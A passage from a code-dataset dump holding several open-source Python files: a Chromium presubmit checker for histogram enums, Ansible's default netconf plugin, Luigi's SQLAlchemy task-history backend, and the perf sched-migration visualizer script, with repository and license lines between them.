        item = "%s(%d)" % (self.LOCAL_PATH, line_number)
    else:
        item = "%s(%d): %s" % (self.LOCAL_PATH, line_number, line_text)
    long_message = self.GetLongMessage()
    self.LogInfo(message)
    self.results.append(
        self.output_api.PresubmitPromptWarning(message, [item], long_message))
def CollectRangesInsideEnumDefinition(self, affected_file,
                                      first_line, last_line):
    """Returns a list of (line_start, line_end, line_text) triplets of ranges
    of edited lines. The |line_text| part is the text at line |line_start|.
    Since it is used only for reporting purposes, we do not need all the text
    lines in the range.
    """
    results = []
    previous_line_number = 0
    previous_range_start_line_number = 0
    previous_range_start_text = ""

    def addRange():
        # Fix: the local was named |tuple|, shadowing the builtin type.
        # The enclosing locals are only read here, never rebound, so this
        # closure works on Python 2 without nonlocal.
        entry = (previous_range_start_line_number,
                 previous_line_number,
                 previous_range_start_text)
        results.append(entry)

    for line_number, line_text in affected_file.ChangedContents():
        if first_line <= line_number and line_number <= last_line:
            self.LogDebug("Line change at line number " + str(line_number) + ": " +
                          line_text)
            # Start a new interval if none started
            if previous_range_start_line_number == 0:
                previous_range_start_line_number = line_number
                previous_range_start_text = line_text
            # Add new interval if we reached past the previous one
            elif line_number != previous_line_number + 1:
                addRange()
                previous_range_start_line_number = line_number
                previous_range_start_text = line_text
            previous_line_number = line_number

    # Add a last interval if needed
    if previous_range_start_line_number != 0:
        addRange()
    return results
def CheckForFileDeletion(self, affected_file):
    """Emit a warning and return False when the file was deleted in the CL.

    NewContents() is empty for a deleted file. (Fix: the stray trailing
    semicolon after the EmitWarning call was removed.)
    """
    if not affected_file.NewContents():
        self.EmitWarning("The file seems to be deleted in the changelist. If "
                         "your intent is to really delete the file, the code in "
                         "PRESUBMIT.py should be updated to remove the "
                         "|HistogramValueChecker| class.")
        return False
    return True
def GetDeletedLinesFromScmDiff(self, affected_file):
    """Return a list of line numbers (1-based) corresponding to lines
    deleted from the new source file (if they had been present in it). Note
    that if multiple contiguous lines have been deleted, the returned list will
    contain contiguous line number entries. To prevent false positives, we
    return deleted line numbers *only* from diff chunks which decrease the size
    of the new file.

    Note: We need this method because we have access to neither the old file
    content nor the list of "delete" changes from the current presubmit script
    API.
    """
    results = []
    line_num = 0
    deleting_lines = False
    for line in affected_file.GenerateScmDiff().splitlines():
        # Parse the unified diff chunk optional section heading, which looks like
        # @@ -l,s +l,s @@ optional section heading
        m = self.input_api.re.match(
            r'^@@ \-([0-9]+)\,([0-9]+) \+([0-9]+)\,([0-9]+) @@', line)
        if m:
            old_line_num = int(m.group(1))
            old_size = int(m.group(2))
            new_line_num = int(m.group(3))
            new_size = int(m.group(4))
            # Reset the new-file line counter to this chunk's start.
            line_num = new_line_num
            # Return line numbers only from diff chunks decreasing the size of the
            # new file
            deleting_lines = old_size > new_size
            continue
        # Context ('+' or ' ') lines exist in the new file and advance the
        # new-file counter; '-' lines do not.
        if not line.startswith('-'):
            line_num += 1
        # A '-' line that is not the '---' file header marks a deletion:
        # record the new-file position where it would have been.
        if deleting_lines and line.startswith('-') and not line.startswith('--'):
            results.append(line_num)
    return results
def CheckForEnumEntryDeletions(self, affected_file):
    """Warn about deleted lines inside the enum definition.

    Simple heuristic (not 100% accurate): any deleted line whose position
    falls inside the enum's line range is reported as a suspected entry
    deletion. Returns False when at least one such deletion was found.
    """
    enum_range = self.ComputeEnumRangeInNewFile(affected_file)
    if not enum_range:
        return False

    no_suspect_deletion = True
    for deleted_line in self.GetDeletedLinesFromScmDiff(affected_file):
        if enum_range.Contains(deleted_line):
            self.EmitWarning("It looks like you are deleting line(s) from the "
                             "enum definition. This should never happen.",
                             deleted_line)
            no_suspect_deletion = False
    return no_suspect_deletion
def CheckForEnumEntryInsertions(self, affected_file):
    """Warn for edits inside the enum that are not appended at its end.

    Returns False when at least one suspicious (non-append) edit was found.
    (Fix: the local was named |range|, shadowing the builtin.)
    """
    enum_range = self.ComputeEnumRangeInNewFile(affected_file)
    if not enum_range:
        return False
    first_line = enum_range.first_line
    last_line = enum_range.last_line

    # Collect the range of changes inside the enum definition range.
    is_ok = True
    for line_start, line_end, line_text in \
            self.CollectRangesInsideEnumDefinition(affected_file,
                                                   first_line,
                                                   last_line):
        # The only edit we consider valid is adding 1 or more entries *exactly*
        # at the end of the enum definition. Every other edit inside the enum
        # definition will result in a "warning confirmation" message.
        #
        # TODO(rpaquay): We currently cannot detect "renames" of existing entries
        # vs invalid insertions, so we sometimes will warn for valid edits.
        is_valid_edit = (line_end == last_line - 1)
        self.LogDebug("Edit range in new file at starting at line number %d and "
                      "ending at line number %d: valid=%s"
                      % (line_start, line_end, is_valid_edit))
        if not is_valid_edit:
            self.EmitWarning("The change starting at line %d and ending at line "
                             "%d is *not* located *exactly* at the end of the "
                             "enum definition. Unless you are renaming an "
                             "existing entry, this is not a valid changes, as new "
                             "entries should *always* be added at the end of the "
                             "enum definition, right before the 'ENUM_BOUNDARY' "
                             "entry." % (line_start, line_end),
                             line_start,
                             line_text)
            is_ok = False
    return is_ok
def PerformChecks(self, affected_file):
    """Run every enum check in order, stopping at the first failure."""
    checks = (
        self.CheckForFileDeletion,
        self.CheckForEnumEntryDeletions,
        self.CheckForEnumEntryInsertions,
    )
    for check in checks:
        if not check(affected_file):
            return
def ProcessHistogramValueFile(self, affected_file):
    """Run all enum checks against the watched histogram header file."""
    self.LogInfo("Start processing file \"%s\"" % affected_file.LocalPath())
    self.PerformChecks(affected_file)
    self.LogInfo("Done processing file \"%s\"" % affected_file.LocalPath())
def Run(self):
    """Process every affected file matching LOCAL_PATH and return the
    accumulated presubmit results.

    Fix: the loop variable was renamed from |file|, which shadowed the
    (Python 2) builtin.
    """
    for affected_file in self.input_api.AffectedFiles(include_deletes=True):
        if affected_file.LocalPath() == self.LOCAL_PATH:
            self.ProcessHistogramValueFile(affected_file)
    return self.results
def CheckChangeOnUpload(input_api, output_api):
    """Presubmit entry point: run the histogram-enum checks on upload."""
    checker = HistogramValueChecker(input_api, output_api)
    results = []
    results.extend(checker.Run())
    return results
|
bsd-3-clause
|
xen0l/ansible
|
lib/ansible/plugins/netconf/default.py
|
79
|
2030
|
#
# (c) 2017 Red Hat Inc.
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import json
from ansible.module_utils._text import to_text, to_bytes
from ansible.plugins.netconf import NetconfBase
class Netconf(NetconfBase):
    """Default netconf plugin used when no network_os-specific plugin exists."""

    def get_text(self, ele, tag):
        """Return the stripped text of child *tag* under *ele*, or None when absent."""
        try:
            return to_text(ele.find(tag).text, errors='surrogate_then_replace').strip()
        except AttributeError:
            # ele.find(tag) returned None (no such child); fall through to
            # the implicit None return.
            pass

    def get_device_info(self):
        """Minimal device info: this generic plugin only knows the OS name."""
        device_info = dict()
        device_info['network_os'] = 'default'
        return device_info

    def get_capabilities(self):
        """Return a JSON document describing supported RPCs and session capabilities."""
        result = dict()
        # BUG FIX: 'copy_copy' was a typo for 'copy_config' (the NETCONF
        # <copy-config> operation, RFC 6241 section 7.3).
        result['rpc'] = self.get_base_rpc() + ['commit', 'discard_changes', 'validate', 'lock', 'unlock', 'copy_config',
                                               'execute_rpc', 'load_configuration', 'get_configuration', 'command',
                                               'reboot', 'halt']
        result['network_api'] = 'netconf'
        result['device_info'] = self.get_device_info()
        result['server_capabilities'] = [c for c in self.m.server_capabilities]
        result['client_capabilities'] = [c for c in self.m.client_capabilities]
        result['session_id'] = self.m.session_id
        result['device_operations'] = self.get_device_operations(result['server_capabilities'])
        return json.dumps(result)
|
gpl-3.0
|
dhruvg/luigi
|
luigi/db_task_history.py
|
50
|
8720
|
# -*- coding: utf-8 -*-
#
# Copyright 2012-2015 Spotify AB
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""
Provides a database backend to the central scheduler. This lets you see historical runs.
See :ref:`TaskHistory` for information about how to turn on the task history feature.
"""
#
# Description: Added codes for visualization of how long each task takes
# running-time until it reaches the next status (failed or done)
# At "{base_url}/tasklist", all completed(failed or done) tasks are shown.
# At "{base_url}/tasklist", a user can select one specific task to see
# how its running-time has changed over time.
# At "{base_url}/tasklist/{task_name}", it visualizes a multi-bar graph
# that represents the changes of the running-time for a selected task
# up to the next status (failed or done).
# This visualization let us know how the running-time of the specific task
# has changed over time.
#
# Copyright 2015 Naver Corp.
# Author Yeseul Park ([email protected])
#
import datetime
import logging
from contextlib import contextmanager
from luigi import six
from luigi import configuration
from luigi import task_history
from luigi.task_status import DONE, FAILED, PENDING, RUNNING
import sqlalchemy
import sqlalchemy.ext.declarative
import sqlalchemy.orm
import sqlalchemy.orm.collections
# Declarative base shared by the TaskParameter/TaskEvent/TaskRecord models.
Base = sqlalchemy.ext.declarative.declarative_base()
logger = logging.getLogger('luigi-interface')
class DbTaskHistory(task_history.TaskHistory):
    """
    Task History that writes to a database using sqlalchemy.
    Also has methods for useful db queries.
    """
    @contextmanager
    def _session(self, session=None):
        # Yield a caller-supplied session unchanged when given; otherwise
        # create one, commit on success, and roll back (re-raising) on error.
        if session:
            yield session
        else:
            session = self.session_factory()
            try:
                yield session
            except:  # rollback must run for *any* failure, then re-raise
                session.rollback()
                raise
            else:
                session.commit()

    def __init__(self):
        config = configuration.get_config()
        # Connection string from the [task_history] section, e.g.
        # "sqlite:///history.db".
        connection_string = config.get('task_history', 'db_connection')
        self.engine = sqlalchemy.create_engine(connection_string)
        # expire_on_commit=False keeps returned records usable after commit.
        self.session_factory = sqlalchemy.orm.sessionmaker(bind=self.engine, expire_on_commit=False)
        Base.metadata.create_all(self.engine)
        self.tasks = {}  # task_id -> task_history.Task (in-memory cache)

    def task_scheduled(self, task_id):
        """Record a PENDING event for *task_id*."""
        task = self._get_task(task_id, status=PENDING)
        self._add_task_event(task, TaskEvent(event_name=PENDING, ts=datetime.datetime.now()))

    def task_finished(self, task_id, successful):
        """Record a DONE or FAILED event for *task_id*."""
        event_name = DONE if successful else FAILED
        task = self._get_task(task_id, status=event_name)
        self._add_task_event(task, TaskEvent(event_name=event_name, ts=datetime.datetime.now()))

    def task_started(self, task_id, worker_host):
        """Record a RUNNING event for *task_id* on *worker_host*."""
        task = self._get_task(task_id, status=RUNNING, host=worker_host)
        self._add_task_event(task, TaskEvent(event_name=RUNNING, ts=datetime.datetime.now()))

    def _get_task(self, task_id, status, host=None):
        # Fetch the cached Task (updating status/host in place), or create
        # and cache a new one.
        if task_id in self.tasks:
            task = self.tasks[task_id]
            task.status = status
            if host:
                task.host = host
        else:
            task = self.tasks[task_id] = task_history.Task(task_id, status, host)
        return task

    def _add_task_event(self, task, event):
        # _find_or_create_task is a generator; iterating it drives the
        # session context manager so the appended event gets committed.
        for (task_record, session) in self._find_or_create_task(task):
            task_record.events.append(event)

    def _find_or_create_task(self, task):
        with self._session() as session:
            if task.record_id is not None:
                logger.debug("Finding task with record_id [%d]", task.record_id)
                task_record = session.query(TaskRecord).get(task.record_id)
                if not task_record:
                    raise Exception("Task with record_id, but no matching Task record!")
                yield (task_record, session)
            else:
                task_record = TaskRecord(name=task.task_family, host=task.host)
                for (k, v) in six.iteritems(task.parameters):
                    task_record.parameters[k] = TaskParameter(name=k, value=v)
                session.add(task_record)
                yield (task_record, session)
            if task.host:
                task_record.host = task.host
        # The record id is only populated after the session above commits.
        task.record_id = task_record.id

    def find_all_by_parameters(self, task_name, session=None, **task_params):
        """
        Find tasks with the given task_name and the same parameters as the kwargs.
        """
        with self._session(session) as session:
            tasks = session.query(TaskRecord).join(TaskEvent).filter(TaskRecord.name == task_name).order_by(TaskEvent.ts).all()
            for task in tasks:
                # Compare stringified values: TaskParameter.value is a string column.
                if all(k in task.parameters and v == str(task.parameters[k].value) for (k, v) in six.iteritems(task_params)):
                    yield task

    def find_all_by_name(self, task_name, session=None):
        """
        Find all tasks with the given task_name.
        """
        return self.find_all_by_parameters(task_name, session)

    def find_latest_runs(self, session=None):
        """
        Return tasks that have been updated in the past 24 hours.
        """
        with self._session(session) as session:
            yesterday = datetime.datetime.now() - datetime.timedelta(days=1)
            return session.query(TaskRecord).\
                join(TaskEvent).\
                filter(TaskEvent.ts >= yesterday).\
                group_by(TaskRecord.id, TaskEvent.event_name, TaskEvent.ts).\
                order_by(TaskEvent.ts.desc()).\
                all()

    def find_all_runs(self, session=None):
        """
        Return all tasks that have been updated.
        """
        with self._session(session) as session:
            return session.query(TaskRecord).all()

    def find_all_events(self, session=None):
        """
        Return all running/failed/done events.
        """
        with self._session(session) as session:
            return session.query(TaskEvent).all()

    def find_task_by_id(self, id, session=None):
        """
        Find task with the given record ID.
        """
        with self._session(session) as session:
            return session.query(TaskRecord).get(id)
class TaskParameter(Base):
    """
    Table to track luigi.Parameter()s of a Task.
    """
    __tablename__ = 'task_parameters'
    # Composite primary key: one row per (task, parameter name) pair.
    task_id = sqlalchemy.Column(sqlalchemy.Integer, sqlalchemy.ForeignKey('tasks.id'), primary_key=True)
    name = sqlalchemy.Column(sqlalchemy.String(128), primary_key=True)
    value = sqlalchemy.Column(sqlalchemy.String(256))

    def __repr__(self):
        return "TaskParameter(task_id=%d, name=%s, value=%s)" % (self.task_id, self.name, self.value)
class TaskEvent(Base):
    """
    Table to track when a task is scheduled, starts, finishes, and fails.
    """
    __tablename__ = 'task_events'
    id = sqlalchemy.Column(sqlalchemy.Integer, primary_key=True)
    task_id = sqlalchemy.Column(sqlalchemy.Integer, sqlalchemy.ForeignKey('tasks.id'))
    event_name = sqlalchemy.Column(sqlalchemy.String(20))
    ts = sqlalchemy.Column(sqlalchemy.TIMESTAMP, index=True, nullable=False)

    def __repr__(self):
        # Fix: the closing parenthesis was missing from the repr string.
        return "TaskEvent(task_id=%s, event_name=%s, ts=%s)" % (self.task_id, self.event_name, self.ts)
class TaskRecord(Base):
    """
    Base table to track information about a luigi.Task.
    References to other tables are available through task.events, task.parameters, etc.
    """
    __tablename__ = 'tasks'
    id = sqlalchemy.Column(sqlalchemy.Integer, primary_key=True)
    name = sqlalchemy.Column(sqlalchemy.String(128), index=True)
    host = sqlalchemy.Column(sqlalchemy.String(128))
    # Parameters keyed by name; deleting the task deletes its parameters.
    parameters = sqlalchemy.orm.relationship(
        'TaskParameter',
        collection_class=sqlalchemy.orm.collections.attribute_mapped_collection('name'),
        cascade="all, delete-orphan")
    # Events ordered newest-first (by timestamp, then id).
    events = sqlalchemy.orm.relationship(
        'TaskEvent',
        order_by=(sqlalchemy.desc(TaskEvent.ts), sqlalchemy.desc(TaskEvent.id)),
        backref='task')

    def __repr__(self):
        return "TaskRecord(name=%s, host=%s)" % (self.name, self.host)
|
apache-2.0
|
wjb/mx-common
|
tools/perf/scripts/python/sched-migration.py
|
11215
|
11670
|
#!/usr/bin/python
#
# Cpu task migration overview toy
#
# Copyright (C) 2010 Frederic Weisbecker <[email protected]>
#
# perf script event handlers have been generated by perf script -g python
#
# This software is distributed under the terms of the GNU General
# Public License ("GPL") version 2 as published by the Free Software
# Foundation.
import os
import sys
from collections import defaultdict
from UserList import UserList
sys.path.append(os.environ['PERF_EXEC_PATH'] + \
'/scripts/python/Perf-Trace-Util/lib/Perf/Trace')
sys.path.append('scripts/python/Perf-Trace-Util/lib/Perf/Trace')
from perf_trace_context import *
from Core import *
from SchedGui import *
# pid -> command name; pid 0 is the idle/swapper task.
threads = {0: "idle"}


def thread_name(pid):
    """Return a "comm:pid" display label for *pid*."""
    comm = threads[pid]
    return "%s:%d" % (comm, pid)
class RunqueueEventUnknown:
    """Fallback event used when a runqueue change has no specific cause."""

    def __repr__(self):
        return "unknown"

    @staticmethod
    def color():
        # No dedicated color: the GUI draws nothing special for this event.
        return None
class RunqueueEventSleep:
    """Runqueue event: a task left the runqueue to go to sleep."""

    def __init__(self, sleeper):
        self.sleeper = sleeper

    def __repr__(self):
        return "%s gone to sleep" % thread_name(self.sleeper)

    @staticmethod
    def color():
        # Blue marks sleep events in the GUI.
        return (0, 0, 0xff)
class RunqueueEventWakeup:
    """Runqueue event: a sleeping task was woken up."""

    def __init__(self, wakee):
        self.wakee = wakee

    def __repr__(self):
        return "%s woke up" % thread_name(self.wakee)

    @staticmethod
    def color():
        # Yellow marks wakeups in the GUI.
        return (0xff, 0xff, 0)
class RunqueueEventFork:
    """Runqueue event: a newly forked task joined the runqueue."""

    def __init__(self, child):
        self.child = child

    def __repr__(self):
        return "new forked task %s" % thread_name(self.child)

    @staticmethod
    def color():
        # Green marks fork events in the GUI.
        return (0, 0xff, 0)
class RunqueueMigrateIn:
    """Runqueue event: a task migrated onto this CPU."""

    def __init__(self, new):
        self.new = new

    def __repr__(self):
        return "task migrated in %s" % thread_name(self.new)

    @staticmethod
    def color():
        # Cyan-ish marks inbound migrations in the GUI.
        return (0, 0xf0, 0xff)
class RunqueueMigrateOut:
    """Runqueue event: a task migrated away from this CPU."""

    def __init__(self, old):
        self.old = old

    def __repr__(self):
        return "task migrated out %s" % thread_name(self.old)

    @staticmethod
    def color():
        # Magenta marks outbound migrations in the GUI.
        return (0xff, 0, 0xff)
class RunqueueSnapshot:
    """Immutable snapshot of one CPU's runqueue and the event that created it."""

    def __init__(self, tasks=(0,), event=None):
        # Fix: the original defaults were the mutable list [0] and a single
        # RunqueueEventUnknown() instance evaluated once at def time; both
        # are now safe, with identical observable behavior for callers.
        self.tasks = tuple(tasks)
        self.event = RunqueueEventUnknown() if event is None else event

    def sched_switch(self, prev, prev_state, next):
        """Return the snapshot after a context switch (may return self)."""
        event = RunqueueEventUnknown()

        # Nothing changed: prev stays runnable and both tasks already queued.
        if taskState(prev_state) == "R" and next in self.tasks \
                and prev in self.tasks:
            return self

        if taskState(prev_state) != "R":
            event = RunqueueEventSleep(prev)

        next_tasks = list(self.tasks[:])
        if prev in self.tasks:
            if taskState(prev_state) != "R":
                next_tasks.remove(prev)
        elif taskState(prev_state) == "R":
            next_tasks.append(prev)

        if next not in next_tasks:
            next_tasks.append(next)

        return RunqueueSnapshot(next_tasks, event)

    def migrate_out(self, old):
        """Return the snapshot after *old* migrated away (self if absent)."""
        if old not in self.tasks:
            return self
        next_tasks = [task for task in self.tasks if task != old]
        return RunqueueSnapshot(next_tasks, RunqueueMigrateOut(old))

    def __migrate_in(self, new, event):
        if new in self.tasks:
            # Already queued: just record the triggering event in place.
            self.event = event
            return self
        next_tasks = self.tasks[:] + tuple([new])
        return RunqueueSnapshot(next_tasks, event)

    def migrate_in(self, new):
        return self.__migrate_in(new, RunqueueMigrateIn(new))

    def wake_up(self, new):
        return self.__migrate_in(new, RunqueueEventWakeup(new))

    def wake_up_new(self, new):
        return self.__migrate_in(new, RunqueueEventFork(new))

    def load(self):
        """ Provide the number of tasks on the runqueue.
        Don't count idle"""
        return len(self.tasks) - 1

    def __repr__(self):
        ret = self.tasks.__repr__()
        # NOTE(review): origin_tostring() is not defined anywhere in this
        # file, so repr() on a snapshot raises AttributeError -- confirm
        # whether this debug path is dead code that should be removed.
        ret += self.origin_tostring()
        return ret
class TimeSlice:
    """State of every CPU runqueue during one [start, end] time interval."""

    def __init__(self, start, prev):
        self.start = start
        self.prev = prev
        # end is patched later by next(); until then the slice is empty.
        self.end = start
        # cpus that triggered the event
        self.event_cpus = []
        if prev is not None:
            # Carry forward the previous slice's per-cpu snapshots and load.
            self.total_load = prev.total_load
            self.rqs = prev.rqs.copy()
        else:
            self.rqs = defaultdict(RunqueueSnapshot)
            self.total_load = 0

    def __update_total_load(self, old_rq, new_rq):
        # Track the aggregate (all-cpu) load incrementally.
        diff = new_rq.load() - old_rq.load()
        self.total_load += diff

    def sched_switch(self, ts_list, prev, prev_state, next, cpu):
        old_rq = self.prev.rqs[cpu]
        new_rq = old_rq.sched_switch(prev, prev_state, next)
        if old_rq is new_rq:
            # Snapshot unchanged: nothing to record for this slice.
            return
        self.rqs[cpu] = new_rq
        self.__update_total_load(old_rq, new_rq)
        ts_list.append(self)
        self.event_cpus = [cpu]

    def migrate(self, ts_list, new, old_cpu, new_cpu):
        if old_cpu == new_cpu:
            return
        # Remove the task from the source cpu's snapshot...
        old_rq = self.prev.rqs[old_cpu]
        out_rq = old_rq.migrate_out(new)
        self.rqs[old_cpu] = out_rq
        self.__update_total_load(old_rq, out_rq)
        # ...and add it to the destination cpu's snapshot.
        new_rq = self.prev.rqs[new_cpu]
        in_rq = new_rq.migrate_in(new)
        self.rqs[new_cpu] = in_rq
        self.__update_total_load(new_rq, in_rq)
        ts_list.append(self)
        if old_rq is not out_rq:
            self.event_cpus.append(old_cpu)
        self.event_cpus.append(new_cpu)

    def wake_up(self, ts_list, pid, cpu, fork):
        old_rq = self.prev.rqs[cpu]
        if fork:
            new_rq = old_rq.wake_up_new(pid)
        else:
            new_rq = old_rq.wake_up(pid)
        if new_rq is old_rq:
            return
        self.rqs[cpu] = new_rq
        self.__update_total_load(old_rq, new_rq)
        ts_list.append(self)
        self.event_cpus = [cpu]

    def next(self, t):
        # Close this slice at time t and open the successor slice.
        self.end = t
        return TimeSlice(t, self)
class TimeSliceList(UserList):
    """Time-ordered list of TimeSlice objects plus GUI query helpers."""

    def __init__(self, arg=None):
        # Fix: the original signature was __init__(self, arg=[]) and aliased
        # the shared mutable default, so every TimeSliceList() created
        # without an argument shared one underlying list object.
        self.data = [] if arg is None else arg

    def get_time_slice(self, ts):
        """Return the slice covering timestamp *ts*, creating it if needed."""
        if len(self.data) == 0:
            new_slice = TimeSlice(ts, TimeSlice(-1, None))
        else:
            new_slice = self.data[-1].next(ts)
        return new_slice

    def find_time_slice(self, ts):
        """Binary-search the slice containing *ts*; return its index or -1."""
        if not self.data:
            # Robustness fix: the original indexed self.data[0] on an empty
            # list and raised IndexError instead of reporting "not found".
            return -1
        start = 0
        end = len(self.data)
        found = -1
        searching = True
        while searching:
            if start == end or start == end - 1:
                searching = False

            # Floor division keeps an int index on Python 3 as well (the
            # original "/" only worked under Python 2 division semantics).
            i = (end + start) // 2
            if self.data[i].start <= ts and self.data[i].end >= ts:
                found = i
                end = i
                continue

            if self.data[i].end < ts:
                start = i
            elif self.data[i].start > ts:
                end = i

        return found

    def set_root_win(self, win):
        self.root_win = win

    def mouse_down(self, cpu, t):
        """Show a summary of the runqueue under the mouse in the GUI."""
        idx = self.find_time_slice(t)
        if idx == -1:
            return

        ts = self[idx]
        rq = ts.rqs[cpu]
        raw = "CPU: %d\n" % cpu
        raw += "Last event : %s\n" % rq.event.__repr__()
        raw += "Timestamp : %d.%06d\n" % (ts.start / (10 ** 9), (ts.start % (10 ** 9)) / 1000)
        raw += "Duration : %6d us\n" % ((ts.end - ts.start) / (10 ** 6))
        raw += "Load = %d\n" % rq.load()
        for t in rq.tasks:
            raw += "%s \n" % thread_name(t)

        self.root_win.update_summary(raw)

    def update_rectangle_cpu(self, slice, cpu):
        """Paint one cpu/slice cell; redder means a larger share of the load."""
        rq = slice.rqs[cpu]

        if slice.total_load != 0:
            load_rate = rq.load() / float(slice.total_load)
        else:
            load_rate = 0

        red_power = int(0xff - (0xff * load_rate))
        color = (0xff, red_power, red_power)

        top_color = None
        if cpu in slice.event_cpus:
            # Highlight the cpu(s) that triggered this slice's event.
            top_color = rq.event.color()

        self.root_win.paint_rectangle_zone(cpu, color, top_color, slice.start, slice.end)

    def fill_zone(self, start, end):
        i = self.find_time_slice(start)
        if i == -1:
            return

        # range() is Python 2/3 compatible (the original used xrange).
        for i in range(i, len(self.data)):
            timeslice = self.data[i]
            if timeslice.start > end:
                return

            for cpu in timeslice.rqs:
                self.update_rectangle_cpu(timeslice, cpu)

    def interval(self):
        """Return the (first_start, last_end) covered interval; (0, 0) if empty."""
        if len(self.data) == 0:
            return (0, 0)

        return (self.data[0].start, self.data[-1].end)

    def nr_rectangles(self):
        # NOTE(review): assumes self.data is non-empty -- confirm callers
        # never invoke this before any slice was recorded.
        last_ts = self.data[-1]
        max_cpu = 0
        for cpu in last_ts.rqs:
            if cpu > max_cpu:
                max_cpu = cpu
        return max_cpu
class SchedEventProxy:
    """Dispatches raw perf sched events into the TimeSliceList model."""

    def __init__(self):
        # cpu -> pid currently believed to be running there (-1 = unknown).
        self.current_tsk = defaultdict(lambda : -1)
        self.timeslices = TimeSliceList()

    def sched_switch(self, headers, prev_comm, prev_pid, prev_prio, prev_state,
                     next_comm, next_pid, next_prio):
        """ Ensure the task we sched out this cpu is really the one
        we logged. Otherwise we may have missed traces """
        on_cpu_task = self.current_tsk[headers.cpu]
        if on_cpu_task != -1 and on_cpu_task != prev_pid:
            # Python 2 print statement: this script predates Python 3.
            print "Sched switch event rejected ts: %s cpu: %d prev: %s(%d) next: %s(%d)" % \
                (headers.ts_format(), headers.cpu, prev_comm, prev_pid, next_comm, next_pid)

        # Keep the pid -> comm map fresh for display labels.
        threads[prev_pid] = prev_comm
        threads[next_pid] = next_comm
        self.current_tsk[headers.cpu] = next_pid

        ts = self.timeslices.get_time_slice(headers.ts())
        ts.sched_switch(self.timeslices, prev_pid, prev_state, next_pid, headers.cpu)

    def migrate(self, headers, pid, prio, orig_cpu, dest_cpu):
        ts = self.timeslices.get_time_slice(headers.ts())
        ts.migrate(self.timeslices, pid, orig_cpu, dest_cpu)

    def wake_up(self, headers, comm, pid, success, target_cpu, fork):
        if success == 0:
            # Failed wakeups do not change any runqueue.
            return
        ts = self.timeslices.get_time_slice(headers.ts())
        ts.wake_up(self.timeslices, pid, target_cpu, fork)
def trace_begin():
    """perf hook: called once before event processing starts."""
    global parser
    parser = SchedEventProxy()
def trace_end():
    """perf hook: called after all events; hands the data to the wx GUI."""
    # NOTE(review): wx and RootFrame are expected to come from the SchedGui
    # star-import at the top of the file -- confirm SchedGui re-exports wx.
    app = wx.App(False)
    timeslices = parser.timeslices
    frame = RootFrame(timeslices, "Migration")
    app.MainLoop()
# The handlers below were auto-generated by "perf script -g python".
# This visualization does not use these events, so they intentionally
# do nothing.
def sched__sched_stat_runtime(event_name, context, common_cpu,
                              common_secs, common_nsecs, common_pid, common_comm,
                              comm, pid, runtime, vruntime):
    pass

def sched__sched_stat_iowait(event_name, context, common_cpu,
                             common_secs, common_nsecs, common_pid, common_comm,
                             comm, pid, delay):
    pass

def sched__sched_stat_sleep(event_name, context, common_cpu,
                            common_secs, common_nsecs, common_pid, common_comm,
                            comm, pid, delay):
    pass

def sched__sched_stat_wait(event_name, context, common_cpu,
                           common_secs, common_nsecs, common_pid, common_comm,
                           comm, pid, delay):
    pass

def sched__sched_process_fork(event_name, context, common_cpu,
                              common_secs, common_nsecs, common_pid, common_comm,
                              parent_comm, parent_pid, child_comm, child_pid):
    pass

def sched__sched_process_wait(event_name, context, common_cpu,
                              common_secs, common_nsecs, common_pid, common_comm,
                              comm, pid, prio):
    pass

def sched__sched_process_exit(event_name, context, common_cpu,
                              common_secs, common_nsecs, common_pid, common_comm,
                              comm, pid, prio):
    pass

def sched__sched_process_free(event_name, context, common_cpu,
                              common_secs, common_nsecs, common_pid, common_comm,
                              comm, pid, prio):
    pass
def sched__sched_migrate_task(event_name, context, common_cpu,
                              common_secs, common_nsecs, common_pid, common_comm,
                              comm, pid, prio, orig_cpu,
                              dest_cpu):
    """perf hook: forward task-migration events to the global proxy."""
    event_headers = EventHeaders(common_cpu, common_secs, common_nsecs,
                                 common_pid, common_comm)
    parser.migrate(event_headers, pid, prio, orig_cpu, dest_cpu)
def sched__sched_switch(event_name, context, common_cpu,
                        common_secs, common_nsecs, common_pid, common_comm,
                        prev_comm, prev_pid, prev_prio, prev_state,
                        next_comm, next_pid, next_prio):
    """perf hook: forward context-switch events to the global proxy."""
    headers = EventHeaders(common_cpu, common_secs, common_nsecs,
                           common_pid, common_comm)
    parser.sched_switch(headers, prev_comm, prev_pid, prev_prio, prev_state,
                        next_comm, next_pid, next_prio)
def sched__sched_wakeup_new(event_name, context, common_cpu,
                            common_secs, common_nsecs, common_pid, common_comm,
                            comm, pid, prio, success,
                            target_cpu):
    """perf hook: a freshly forked task woke up (fork flag = 1)."""
    event_headers = EventHeaders(common_cpu, common_secs, common_nsecs,
                                 common_pid, common_comm)
    parser.wake_up(event_headers, comm, pid, success, target_cpu, 1)
def sched__sched_wakeup(event_name, context, common_cpu,
                        common_secs, common_nsecs, common_pid, common_comm,
                        comm, pid, prio, success,
                        target_cpu):
    """perf hook: an existing task woke up (fork flag = 0)."""
    headers = EventHeaders(common_cpu, common_secs, common_nsecs,
                           common_pid, common_comm)
    parser.wake_up(headers, comm, pid, success, target_cpu, 0)
# Remaining auto-generated stubs: events not used by this visualization.
def sched__sched_wait_task(event_name, context, common_cpu,
                           common_secs, common_nsecs, common_pid, common_comm,
                           comm, pid, prio):
    pass

def sched__sched_kthread_stop_ret(event_name, context, common_cpu,
                                  common_secs, common_nsecs, common_pid, common_comm,
                                  ret):
    pass

def sched__sched_kthread_stop(event_name, context, common_cpu,
                              common_secs, common_nsecs, common_pid, common_comm,
                              comm, pid):
    pass

def trace_unhandled(event_name, context, common_cpu, common_secs, common_nsecs,
                    common_pid, common_comm):
    # Catch-all for events with no dedicated handler; ignored.
    pass
|
gpl-2.0
|
TechBK/horizon-dev
|
